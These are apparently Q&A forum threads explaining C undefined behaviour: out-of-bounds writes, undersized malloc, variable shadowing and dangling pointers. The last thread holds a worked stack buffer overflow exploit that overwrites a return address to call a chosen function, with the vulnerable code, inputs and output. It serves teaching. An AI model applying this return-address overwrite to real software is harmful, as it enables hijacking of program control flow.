Can anyone explain this?
Consider this program. We intentionally write out of bounds (dest[12], past the end of the 10-element dest) in order to see the value of j modified.
#include <stdio.h>
#include <stdlib.h>
int main()
{
char source[] = "Hello";
int j = 100;
char dest[10];
dest[12] = 'A';
printf("j = %d \n", j);
fflush(stdout);
printf("j = %d \n", j);
fflush(stdout);
printf("*j = %p \n", &j); // comment this line to get another result!
return 0;
}
output :
j = 4259940
j = 4259940
*j = 0x7ffcc4cdef74
But if we comment out the line that displays the address of the j variable, printf("*j = %p \n", &j);, we get:
j = 100
j = 100
It is like j is stored elsewhere, not just after dest variable as in the first example.
Any explanation?
Where and whether to store the objects j and dest, and how to handle the out-of-bounds write to dest, is the compiler's choice. Modern compilers do many complicated things to optimize programs. When you omit the statement that prints the address of j, the compiler makes different choices, and these produce different results.
A variable is not required to have any storage address if the address is not taken.
The compiler is free to only hold the value in a register or completely remove it via optimization mechanisms and only use the constant value 100 directly.
You might check whether you corrupted source instead when j is not stored on the stack.
The code goes
#include<stdio.h>
int sumOfElements_new(int *A, int size){ // int *A or int A[] same thing
int i, sum = 0; // remember arrays decay as pointers in other functions besides main
for (i =0; i<size;i++){
sum += A[i]; // A[i] = *(A+i)-> value at that address
}
return sum;
}
int main(){
int A[] = {1,2,3,4,5};
int size = sizeof(A)/sizeof(A[0]);
int total = sumOfElements_new(&A[0], size);
printf("%d\n", &A[4]);
printf("Sum of elements = %d\n", total);
printf("Size of A = %d and size of A[0] = %d\n", sizeof(A), sizeof(A[0]));
return 0;
}
Now when I do something like this
int total = sumOfElements_new(&A[3], size);
the result is
Sum of elements = 30
Size of A = 20 and size of A[0] = 4
whenever I use &A[1] to any &A[6], it gives me different values.
Then why calling it in
int size = sizeof(A)/sizeof(A[0]);
gives me the correct sum of the elements, but with &A[1] through &A[6] the answer goes up, and it's not even a memory address?
Given how you define size (int size = sizeof(A)/sizeof(A[0]);), the only valid call is:
sumOfElements_new(&A[0],size)
If you use (e.g.) &A[3], you can't pass:
sumOfElements_new(&A[3],size)
because you're telling the function to sum past the end of the array. This is UB (undefined behavior). In practice the program will often fetch whatever data happens to lie beyond the end, so the result is unpredictable.
You have to shorten the size/length you pass to the function. What you'd want is:
sumOfElements_new(&A[3],size - 3)
UPDATE:
May want to comment on printf("%d\n", &A[4]); as well..
This presents another issue. You [probably] want to print the value of the element of the A that has index 4.
The indexing is correct (i.e. it does not go beyond the end of the array), but you're passing the address of that element and not its value.
With your original code, if you compiled with warnings enabled (e.g. using the -Wall option--which you should always do, IMO), the compiler would flag this statement.
That's because %d expects an int, but you're passing an address, which has pointer type [and on modern x86-64 systems is probably 64 bits wide, whereas an int is usually only 32 bits]. The type mismatch is itself undefined behavior.
So, to print the value, you'd probably want:
printf("%d\n", A[4]);
If you truly wanted to print the address of that element [a more advanced usage], you could do the following (%p expects a void *, hence the cast):
printf("%p\n", (void *)&A[4]);
#include <stdio.h>
#include <stdlib.h>
int main(void) {
int *x, *y;
x = malloc(sizeof(int));
for (int i = 0; i < 4; i++)
x[i] = i + 1;
y = x;
for (int i = 0; i < 4; i++)
printf("%d ", y[i]);
}
This works correctly and outputs 1 2 3 4.
But when I change the loop condition to i < 1000000, it gives a segmentation fault.
Can someone explain this?
You need to allocate a large enough buffer. You only allocate sizeof(int) which is 4 bytes typically and large enough to hold only one integer. Can't store 1000000 elements in that. It worked for 4 elements out of pure chance, probably because although you were overwriting memory, you didn't clobber anything important. Something like this is what you should use.
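#include <stdio.h>
#include <stdlib.h> /* malloc, free */
int main(void)
{
    int count = 1000000;
    int *x, *y;
    x = malloc(sizeof(int) * count); /* room for count ints, not just one */
    if (x == NULL)
        return 1; /* allocation failed */
    for (int i=0; i < count; i++)
        x[i] = i+1;
    y = x;
    for (int i=0; i < count; i++)
        printf("%d ", y[i]);
    free(x);
    return 0;
}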
Undefined behaviour is undefined; you cannot justify any outcome whatsoever.
You have memory allocated for one integer. The moment you try to access memory outside that range (i.e., i >= 1), you're invoking UB. The only valid access is x[0] and x[0] only.
You only allocated memory for one int:
x = malloc(sizeof(int)); // malloc allocates a memory chunk to only hold one int object.
Indexing x at x[i] = i+1; or y at printf("%d ", y[i]); in the loops with anything other than a value of 0 for i (like x[0] or y[0]) invokes undefined behavior, because you would attempt to write to and read from unallocated memory.
"then this means if I don't have any enough buffer, it also will give a segmentation fault for i < 4?"
It could. That is the bad thing about undefined behavior: it does not have to produce wrong results or errors. So, the i < 4 code is broken, too.
Since you wrote "only" 12 bytes past the allocated memory (sizeof(int) is commonly 4), it might have worked because nothing important was stored in the memory right after it, but your code is absolutely broken nonetheless.
You allocated less memory than you used, so your program writes past the end of that block and corrupts whatever lies next to it (here on the heap, since the block came from malloc). This is the same mistake that underlies buffer overflow vulnerabilities in C and C++. Increase the buffer size.
I was doing some exercises on codewars, and had to make a digital_root function (recursively add all digits of a number together, up until there's only one digit left).
I was fairly confident that I did it right, but for some reason my while-loop never broke, even though my prints showed that len was 1.
#include <stdio.h>
#include <string.h>
int digital_root(int n) {
char number[10];
sprintf(number, "%d", n);
int len = strlen(number);
printf("Outer print: %s %d %d\n", number, n, len);
int sum = 0;
while(len > 1)
{
sum = 0;
for(int i = 0; i<len; i++)
{
sum += number[i] - '0';
}
sprintf(number, "%d", sum);
int len = strlen(number); //!!!
printf("Inner print: %s %d %d\n", number, sum, len);
}
return sum;
}
It took me a long time to figure out what was wrong. I noticed that I copy pasted the 'int' keyword when I recalculated the len in the while loop (line marked with !!!). When I removed that (because it was not needed to redefine it as an int, it already was), everything suddenly worked like it was supposed to.
This kinda confused me. Why would this matter? I understand that redefining it is bad practice, but I don't get how this would result in the while-loop not breaking?
The compiler used is Clang 3.6 / C11.
(Ps. When I tried the same code in TIO, it worked in both cases...)
You're not redefining an existing variable, you're defining a new variable.
Consider this example:
#include <stdio.h>
int main(void) {
int x = 42;
printf("Outside, start. x (%p) = %d\n", (void *)&x, x);
{
printf("Inner block, start. x (%p) = %d\n", (void *)&x, x);
int x = 123;
printf("Inner block, end. x (%p) = %d\n", (void *)&x, x);
}
printf("Outside, end. x (%p) = %d\n", (void *)&x, x);
return 0;
}
Sample output:
Outside, start. x (0x7ffd6e6b8abc) = 42
Inner block, start. x (0x7ffd6e6b8abc) = 42
Inner block, end. x (0x7ffd6e6b8ab8) = 123
Outside, end. x (0x7ffd6e6b8abc) = 42
This program outputs the memory address and value of x. Most uses of x refer to the outer variable declared at the beginning of main. But within the inner block, after int x = 123;, all occurrences of x refer to a second, separate variable that happens to also be called x (but is otherwise independent).
When execution leaves the inner block, the outer x variable becomes visible again.
This is also referred to as shadowing.
In your code, the outer len is never modified, so while(len > 1) is always true.
By the way, shadowing is a very common concept in most languages that support block scoping:
Perl
JavaScript
Haskell
Common Lisp
Your second int len creates a second, parallel variable that goes away at the end of the {} block. The original len then returns to life, completely unchanged. Without the second int, the original variable is changed. With it, the original len is effectively an unchanged constant, and the result is an infinite loop.
Please read the code below.
#include <stdio.h>
int main(void)
{
char* a[4];
int i=0;
while(i<3)
{
char b[50];
scanf(" %s",b);//Assume user enters one two three
a[i++]=b;
}
i=0;
while(i<3)
printf(" %s ",a[i++]);//Why does it always print three three three
return 0;
}
Clarify the following:
1. Is it that b gets allocated same 50 bytes in memory each time so that all the elements of array a point to same 50 bytes and thus we get only three printed three times(i.e. what's entered last)
2. Since after the completion of while, array b can be removed very well but no it remains there every single time printing only three's. Why?
3. Is it not at all a coincidence that this code prints only three's when it could print one two three, one three three as well. What's wrong?
I know the question is very wrongly put. Forgive me for that. I am new here.
QUESTION #1:
The variable b is strictly local to the body of the first while loop.
Its lifetime ends at the end of each iteration, so storage for b is set up anew on each of the 3 iterations (although a compiler will typically reuse the same stack slot every time).
Therefore, do not use a pointer to the memory formerly used by b outside (after) the while loop.
QUESTION #2:
After the while loop, the pointers stored in a are not valid anymore, because each a[i] was assigned to point to b, and the lifetime of b ended with the loop.
NEVERTHELESS, the memory that held b may not have been overwritten yet. You cannot predict what dereferencing a[i] will yield after the while loop, since each a[i] only ever pointed at b.
QUESTION #3:
(Please see #2) The code that dereferences the elements of a after the while loop is using stale pointers - I would not rely on the output.
The code in the question exhibits undefined behaviour because the second loop attempts to access the data that was only valid in the first loop. Therefore, there is very little that can usefully be said.
The question title is "does a variable declared in a loop get the same address each time the loop executes". Here's a proof by counter-example that the address of the variables in a loop need not always be the same, even in a single invocation of a non-recursive function.
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
int main(void)
{
srand(time(0));
for (int i = 0; i < 3; i++)
{
int n = rand() % 30 + 5;
char a[n];
for (int j = 0; j < n - 1; j++)
a[j] = rand() % 26 + 'a';
a[n-1] = '\0';
printf("a: %p %2d [%s]\n", (void *)a, n, a);
char b[50+n];
scanf("%s", b);
printf("b: %p %2d [%s]\n", (void *)b, n+50, b);
}
return 0;
}
On a Mac running macOS Sierra 10.12.4 (using GCC 7.1.0), one run of the program (lv83) produced:
$ ./lv83 <<< 'androgynous hermaphrodite pink-floyds-greatest-hits-dark-side-of-the-moon'
a: 0x7fff507e53b0 23 [sngrhgjganmgxvwahshvzt]
b: 0x7fff507e5360 73 [androgynous]
a: 0x7fff507e53c0 9 [wblbvifc]
b: 0x7fff507e5380 59 [hermaphrodite]
a: 0x7fff507e53b0 26 [pqsbfnnuxuldaactiwvjzvifb]
b: 0x7fff507e5360 76 [pink-floyds-greatest-hits-dark-side-of-the-moon]
$
The address at which the two arrays are allocated varies depending on how big they are. By using different formulae for the sizes of the two arrays, the base addresses could be tweaked. It looks as though the compiler rounds the base address of the arrays to a multiple of 16.
I have this block of code which obviously contains a buffer overflow, because I can enter more than 4 values into array a. I want to call a function using the buffer overflow. I know the address of this function. I know that I need to overwrite the function's return address, but I'm not sure how to actually do this. Also, if I set n = 5 and write 5 values into array a, the program does not crash, even though there is only memory allocated for 4 values. Why is this, and what can I do to get the program to crash? I'm using an older release of Ubuntu that doesn't check for buffer overflows.
int a[4];
for (i = 0;i <n ;i++)
printf ("\n a[%d] = %x, address = %x", i, a[i], &a[i]);
printf("\nEnter %d HEX Values \n", n);
for (i=0;i<n;i++)
scanf("%x",&a[i]);
printf("Done reading\n");
Here is an exploit that worked on my system (GCC on x86_64 GNU/Linux). Please don't tell me that you've tried it and it “didn't work” – the program deliberately invokes undefined behavior and this is, by its very nature, not portable. There is nothing in the C standard that says a compiler must produce code that is easy to exploit in a portable manner.
To give a complete example, I have modified the code a little. First some headers:
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
Here is the vulnerable function we wish to exploit:
static int
vulnerable(void)
{
uint64_t a[4];
int n;
int i;
for (i = 0; i < 10; ++i)
printf("a[%d] = 0x%016lX\n", i, a[i]);
printf("Enter the number of values: ");
scanf("%d", &n);
for (i = 0; i < n; ++i)
{
printf("Enter value %d of %d: ", i, n);
uint64_t temp;
scanf("%lX", &temp);
if (temp)
a[i] = temp;
}
for (i = 0; i < 10; ++i)
printf("a[%d] = 0x%016lX\n", i, a[i]);
return n;
}
I have modified the code a little such that it will only write non-zero values. This makes it a little less likely that we overwrite something we don't want to overwrite. This is of course unnecessary as in this case we could have equally well simply input the value that we know was already stored at the address.
And here is the function we'd like to call:
static void
target(void)
{
printf("Exploit succeeded!\n");
exit(0);
}
To avoid having to read assembly or decompile objects, we'll add some diagnostic output to the main function. It should be clear that the exploit doesn't rely on this.
int
main()
{
assert(sizeof(void *) == sizeof(uint64_t)); /* (1) */
printf("%p return\n", (&&label)); /* (2) */
printf("%p target\n", target); /* (3) */
vulnerable();
label:
return 0;
}
Line (1) is just to make sure we are assuming the correct address size. On line (2) we print the return address that will be on the stack when vulnerable is called. (The &&label syntax is a GCC extension to get the address of a label.) Line (3) prints out the address of our target function.
We don't want the compiler to do smart things that might spoil our exploit so we'll disable all optimizations and compile like:
$ gcc -O0 -o main main.c -static
Then, as we run the program, it might output the following:
$ ./main
0x400e44 return
0x400dfb target
a[0] = 0x0000000000000001
a[1] = 0x0000000000000001
a[2] = 0x00007FFF3E81E588
a[3] = 0x00000000004014F7
a[4] = 0x0000000000400290
a[5] = 0x00000005006B4310
a[6] = 0x00007FFF3E81E4A0
a[7] = 0x0000000000400E44
a[8] = 0x00000000006B4310
a[9] = 0x0000000000401093
We quickly spot the return address at offset 7.
We might have gained the same knowledge from carefully reading the assembly code. Knowing what we have to do, we feed the program with:
Enter the number of values: 8
Enter value 0 of 8: 0
Enter value 1 of 8: 0
Enter value 2 of 8: 0
Enter value 3 of 8: 0
Enter value 4 of 8: 0
Enter value 5 of 8: 0
Enter value 6 of 8: 0
Enter value 7 of 8: 0x400dfb
The following output shows us that we have successfully overwritten the return address and that the exploit actually succeeded.
a[0] = 0x0000000000000001
a[1] = 0x0000000000000001
a[2] = 0x00007FFF3E81E588
a[3] = 0x00000000004014F7
a[4] = 0x0000000000400290
a[5] = 0x00000005006B4310
a[6] = 0x00007FFF3E81E4A0
a[7] = 0x0000000000400DFB
a[8] = 0x00000000006B4310
a[9] = 0x0000000000401093
Exploit succeeded!